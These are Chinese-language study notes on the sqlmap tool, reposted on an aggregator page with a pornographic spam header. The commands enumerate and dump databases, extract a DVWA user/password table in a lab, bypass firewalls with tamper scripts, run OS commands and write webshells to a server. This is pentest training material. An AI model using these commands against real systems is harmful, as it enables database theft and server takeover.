日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

SQLMAP使用笔记

發(fā)布時(shí)間:2025/3/21 数据库 55 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SQLMAP使用笔记 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

?SQLMAP 使用筆記
?? ??? ?--by Anton
0-請(qǐng)求注入檢測
?? ?sqlmap可以使用基于布爾(bool)、時(shí)間(time)、語句是否執(zhí)行

(頁面返回時(shí)間是否增加)、報(bào)錯(cuò)(error)、聯(lián)合查詢(union)、堆查詢(同時(shí)執(zhí)行多條語句)
?? ?get方式 sqlmap.py -u "URL"
?? ?post方式 sqlmap.py -u "URL" --data "post數(shù)據(jù)"
?? ?cookie方式 sqlmap.py -u "URL" --cookie "cookie數(shù)據(jù)"

1-獲取數(shù)據(jù)庫信息
?? ?獲取數(shù)據(jù)庫類型及版本
?? ?獲取數(shù)據(jù)庫庫名和用戶名? ?
?? ??? ??? ?sqlmap.py -u "URL" --current-db/--current-user

2-獲取數(shù)據(jù)量和用戶權(quán)限
?? ?數(shù)據(jù)量 sqlmap.py -u "URL" --count -D "DB_name"
?? ?判斷用戶權(quán)限 sqlmap.py -u "URL" --privileges
?? ?? Microsoft SQL Server 最高權(quán)限:sa
?? ?? Mysql :root

3-Mysql數(shù)據(jù)庫注入
?? ?mysql數(shù)據(jù)庫結(jié)構(gòu)
?? ?mysql注入?? ?庫名?? ?sqlmap.py -u "URL" --current-db
?? ??? ??? ??? ?表名?? ?sqlmap.py -u "URL" --tables -D "DB_name"
?? ??? ??? ??? ?列名?? ?sqlmap.py -u "URL" --columns -T "Tables_name" -D "DB_name"
?? ??? ??? ??? ?字段?? ?sqlmap.py -u "URL" --dump -C "Columns_name" -T "Tables_name" -D "DB_name"
?? ??? ??? ??? ??? ?sqlmap常用選項(xiàng):
?? ??? ??? ??? ??? ?? --second-order 當(dāng)web程序輸入與返回不在一處界面時(shí),使用此參數(shù)監(jiān)控另一處頁面
?? ??? ??? ??? ??? ??? ?sqlmap -r /root/1 --second-order="http://172.16.12.2/vulnerabilities/sqli/" --dbs
?? ??? ??? ??? ??? ?? --tables -D “數(shù)據(jù)庫” 列舉數(shù)據(jù)庫的表名
?? ??? ??? ??? ??? ?? --columns -T “表名” -D “數(shù)據(jù)庫” 獲取表的列名
?? ??? ??? ??? ??? ?? --dump -C “字段,字段” -T “表名” -D “數(shù)據(jù)庫” 獲取表中的數(shù)據(jù),包含列
?? ?新的數(shù)據(jù)庫注入
?? ??? ?MongoDB、NoSQL--sqlmap不支持這兩款的注入,Nosqlmap使用
?? ??? ??? ??? ?https://github.com/tcstool/nosqlmap
?? ??? ??? ??? ?
4-管理數(shù)據(jù)庫
?? ?連接數(shù)據(jù)庫?? ?sqlmap.py -d "mysql://用戶名:密碼@地址:端口/數(shù)據(jù)庫"
?? ??? ?--報(bào)錯(cuò)需安裝pymysql?? ??? ?https://github.com/PyMySQL/PyMySQL
?? ??? ??? ?安裝步驟:解壓->cmd切換目錄->setup.py install
?? ?連接上使用參數(shù):--sql-shell 進(jìn)行sql執(zhí)行管理
?? ??? ?sqlmap.py -d "mysql://用戶名:密碼@地址:端口/數(shù)據(jù)庫" --sql-shell
?? ??? ??? ?@@cersion--查看數(shù)據(jù)庫版本

5-延時(shí)注入
?? ?使用情況
?? ??? ?頁面無變化、無法使用布爾真假判斷、無法報(bào)錯(cuò)--作為最精準(zhǔn)的注入缺點(diǎn):耗時(shí)長
?? ?如何使用
?? ??? ?--delay 數(shù)值(延時(shí)秒數(shù)) sqlmap.py -u "URL" --delay 1
?? ??? ?--safe-freq?? ??? ?sqlmap.py -u "URL" --safe-freq
?? ??? ?
6-交互式命令執(zhí)行和寫webshell
?? ?初識(shí)交互式
?? ??? ?注入點(diǎn)用戶權(quán)限必須為最高權(quán)限
?? ?sqlmap進(jìn)行命令執(zhí)行(提權(quán))
?? ??? ?sqlmap.py -u "URL" --os-cmd="命令"
?? ??? ?在使用參數(shù)交互時(shí)要知道網(wǎng)站的絕對(duì)路徑-盤符開始
?? ??? ?執(zhí)行后0-選擇網(wǎng)站語言1
?? ??? ?-何種方法尋找網(wǎng)站絕對(duì)路徑
?? ??? ?執(zhí)行命令后在網(wǎng)站絕對(duì)路徑下創(chuàng)建了文件,命令執(zhí)行后自動(dòng)刪除
?? ?sqlmap寫webshell and 提權(quán)
?? ??? ?sqlmap.py -u "URL" --os-shell
?? ??? ?執(zhí)行后0-選擇網(wǎng)站語言1-何種方法尋找網(wǎng)站絕對(duì)路徑
?? ??? ?--關(guān)閉sqlmap自動(dòng)刪除

7-Tamper腳本的介紹和使用
?? ?Whate is Tamper?
?? ??? ?sqlmap下的tamper目錄,高級(jí)sql注入測試,如繞過waf(web應(yīng)用防火墻)
?? ?Tamper腳本的使用
?? ??? ?--tamper="腳本名字"
?? ??? ?sqlmap.py -u "URL" --tamper="腳本名字"
?? ??? ?sqlmap.py -u "url" --current-db? --dbms=mysql(是access就輸access) --tamper “腳本名稱(比如1.py)”
?? ?Tamper腳本的總結(jié)
?? ??? ?
8-本地寫入webshell
?? ?what is 本地寫入/如何寫入?
?? ??? ?zaisqlmap目錄下新建一個(gè)目錄mst,在該目錄下創(chuàng)建需上傳的文件
?? ??? ?--file-write "./mst/mst.txt"
?? ??? ??? ?本地文件的地址/路徑
?? ??? ?--file-dest "d:/www/1.html"
?? ??? ??? ?目標(biāo)文件的地址/路徑
?? ??? ?sqlmap.py -u "URL" --file-write "./mst/mst.txt" --file-dest "d:/www/1.html"
?? ?
9-批量檢測注入漏洞
?? ?what is 批量?
?? ??? ?批量檢測sql注入
?? ?如何批量
?? ??? ?-m
?? ??? ?sqlmap.py -m 路徑
?? ?結(jié)合burpsuite
?? ??? ?對(duì)post、cookie、http header等檢測
?? ??? ?burpsuite記錄所有request記錄,并保存在指定文件夾
?? ??? ?sqlmap.py -l c:/burp.log --batch -smart
?? ??? ??? ?即可對(duì)burp.log中保存的所有request進(jìn)行注入掃描
?? ??? ??? ?Batch:自動(dòng)選擇yes
?? ??? ??? ?Smart:啟發(fā)式快速判斷,節(jié)約時(shí)間
?? ??? ??? ??? ?--level=(1-5) #要執(zhí)行的測試水平等級(jí),默認(rèn)為1
?? ??? ??? ??? ??? ?sqlmap使用的payload可以在xml/payloads/中看到,參數(shù)數(shù)值影響測試的注

     入點(diǎn),http cookie在level為2時(shí)候會(huì)測試,http user——agent/referer頭在level為3會(huì)測試
?? ??? ??? ??? ??? ?為保證全面性,level最好設(shè)置最高
?? ??? ??? ??? ?--risk=(0-3) #測試執(zhí)行的風(fēng)險(xiǎn)等級(jí),默認(rèn)為1
?? ??? ??? ??? ??? ?默認(rèn)的1會(huì)測試大部分測試語句,2會(huì)增加基于事件的測試語句,3會(huì)增加OR語句的sql注入測試
?? ??? ??? ??? ??? ?#有時(shí)候,例如在Update的語句中,注入一個(gè)or的測試語句,可能會(huì)導(dǎo)致更新整個(gè)表,風(fēng)險(xiǎn)很大
?? ??? ??? ??? ??? ?#測試語句可xml/payloads/中找到,也可自行添加

10-Sqlmap注入
?? ?SQLMAP目錄結(jié)構(gòu)
?? ??? ?doc/ --->>>該文件夾包含了SQLmap的具體使用說明,例如多種語言的簡要說明、PDF版的詳細(xì)說明、FAQ、作者信息等。
?? ??? ?extra/ -->> >這里包含了SQLmap的多種額外功能,例如發(fā)出聲響( beep).運(yùn)行cmd.安全執(zhí)行、shellcode等。
?? ??? ?lib/ -->>>這里包含了SQLmap的多種連接庫,如五種注入類型請(qǐng)求的參數(shù)、提權(quán)操作等。
?? ??? ?plugins/ -->> >這里包含了各種數(shù)據(jù)庫的信息和數(shù)據(jù)庫通用事項(xiàng)。
?? ??? ?procs/ -->>>這里包含了mssqlserver、mysql. Oracle和postgresql的觸發(fā)程序
?? ??? ?shell/ -->>>這里包含了多種注入成功后的多種sheli遠(yuǎn)程連接命令執(zhí)行和管理數(shù)據(jù)庫
?? ??? ?tamper/ -->>>這里包含了繞過腳本,例如編碼繞過、注釋繞過等。
?? ??? ?thirdparty/ -->>>這里包含了一些其他第三方的插件,例如優(yōu)化、保持連接、顏色等。
?? ??? ?txt/ -->>>這里包含了一些字典,例如用戶瀏覽器代理、表、列、關(guān)鍵詞等。
?? ??? ?udf/ -->>>這里包含了用戶自己定義的攻擊載荷。
?? ??? ?waf/ -->>>>這里包含了一一些多種常見的防火墻特征。可以直接使用--identify-waf來進(jìn)行檢測。
?? ??? ?xml/ -->>>這里包含了多種數(shù)據(jù)庫的注入檢測載荷、旗標(biāo)信息以及其他信息。在這里可以看到進(jìn)行注入的。
?? ?學(xué)習(xí)SQLMAP注入
?? ??? ?#xml目錄下payloads-載荷文件
?? ??? ?#-v數(shù)字
?? ??? ??? ?-v有7個(gè)等級(jí),默認(rèn)為1:
?? ??? ??? ??? ?0:只顯示python錯(cuò)誤以及嚴(yán)重的信息
?? ??? ??? ??? ?1:同時(shí)顯示信息和警告信息(默認(rèn))
?? ??? ??? ??? ?2:同時(shí)顯示debug的信息
?? ??? ??? ??? ?3:同時(shí)顯示注入的payload
?? ??? ??? ??? ?4:同時(shí)顯示HTTP請(qǐng)求
?? ??? ??? ??? ?5:同時(shí)顯示HTTP響應(yīng)頭
?? ??? ??? ??? ?6:同時(shí)顯示HTTP響應(yīng)頁面
?? ??? ??? ?sqlmap.py -u "URL" --dba -v 3
?? ??? ?#結(jié)合burpsuite
?? ??? ??? ?--proxy=http://ip:port? 這里的代理服務(wù)器就是burpsuite相對(duì)監(jiān)聽的
?? ??? ??? ??? ?sqlmap.py -u "URL" --proxy="http://127.0.0.1:8080"
11-實(shí)驗(yàn)實(shí)訓(xùn)
?? ??? ?特殊頁面sql注入
?? ??? ??? ?sqlmap -r /root/1 --second-order="http://172.16.12.2/vulnerabilities/sqli/" --dbs
?? ??? ??? ?sqlmap -r /root/1 --second-order="http://172.16.12.2/vulnerabilities/sqli/" --dbs -D “dvwa” --tables?進(jìn)行查詢dvwa數(shù)據(jù)庫的表名
?? ??? ??? ?sqlmap -r /root/1 --second-order="http://172.16.12.2/vulnerabilities/sqli/" --columns -T “users” -D “dvwa”進(jìn)行查詢user表中的列
?? ??? ??? ?sqlmap -r /root/1 --second-order="http://172.16.12.2/vulnerabilities/sqli/" --dump -C “user,password” -T “users” -D “dvwa”?進(jìn)行“脫褲”
?? ??? ?sql盲注漏洞
?? ??? ??? ?
?? ???? RM-Anton原創(chuàng),轉(zhuǎn)載請(qǐng)注明。

轉(zhuǎn)載于:https://www.cnblogs.com/RM-Anton/p/9101089.html

總結(jié)

以上是生活随笔為你收集整理的SQLMAP使用笔记的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。